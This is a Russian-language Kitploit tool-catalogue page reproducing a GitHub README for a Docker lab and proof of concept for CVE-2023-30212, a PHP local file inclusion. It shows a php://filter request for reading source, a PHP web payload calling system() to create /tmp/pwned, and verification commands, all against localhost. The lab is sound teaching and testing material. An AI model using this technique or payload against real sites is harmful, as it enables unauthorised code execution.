Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2023-30212 — PoC for CVE-2023-30212 using Docker | Kitploit
Инструменты/GitHubGitHub/sungmin20/cve-2023-30212
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubsungmin20/cve-2023-30212

cve-2023-30212

PoC for CVE-2023-30212 using Docker

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2023-30212

PoC для CVE-2023-30212 с использованием Docker

CVE-2023-30212: Сборка среды и отчет PoC

📌 Обзор

Этот отчет содержит информацию о создании уязвимой веб-среды на основе Docker для уязвимости CVE-2023-30212, отсутствующей в Vulhub, и демонстрацию уязвимости с помощью PoC.

  • Номер CVE: CVE-2023-30212
  • Описание уязвимости: Возможность удаленного выполнения кода через PHP LFI (Local File Inclusion)
  • Сложность: Высокая (среда, отсутствующая в Vulhub)

🔧 Конфигурация среды

1. Dockerfile и docker-compose конфигурация

  • Базовый образ: php:8.1-apache
  • Копирование vulnerable.php и malicious.php в директорию /var/www/html
  • Внешний доступ через порт 8088 Сборка Docker

2. Описание основных файлов

Имя файлаОписание
vulnerable.phpPHP-файл с уязвимостью LFI
malicious.php
изображение изображение изображение изображение

🚀 Процесс эксплуатации уязвимости (PoC)

1. Запуск контейнера

root@kitploit:~
docker-compose up -d

Имя контейнера: cve-2023-30212-cve-lfi-1

Сервер Apache запускается, становится доступен по адресу http://localhost:8088

2. Просмотр исходного кода вредоносного файла через LFI

Вызовите следующий URL, чтобы просмотреть содержимое malicious.php в кодировке base64:

root@kitploit:~
http://localhost:8088/vulnerable.php?file=php://filter/convert.base64-encode/resource=malicious.php
base64

При декодировании вывода получается следующий PHP-код:

root@kitploit:~
<?php system("touch /tmp/pwned"); ?>
изображение

3. Выполнение команды и проверка результата

Вызовите следующий URL, чтобы фактически выполнить команду:

root@kitploit:~
http://localhost:8088/malicious.php

После выполнения должен создаться файл /tmp/pwned.

root@kitploit:~
docker exec -it cve-2023-30212-cve-lfi-1 ls /tmp

Если в результате присутствует файл pwned, то всё успешно.

файл pwned

Итоговое резюме

  • Успешно просмотрено и декодировано содержимое вредоносного файла через уязвимость LFI на основе php://filter.
  • Успешно выполнена произвольная команда через вызов вредоносного PHP, содержащего функцию system().
  • Проверка PoC завершена созданием файла /tmp/pwned.
Скачать инструмент
Вредоносный PHP-файл для выполнения системных команд
docker-compose.ymlФайл конфигурации для сборки контейнера
DockerfileФайл конфигурации для создания Docker-образа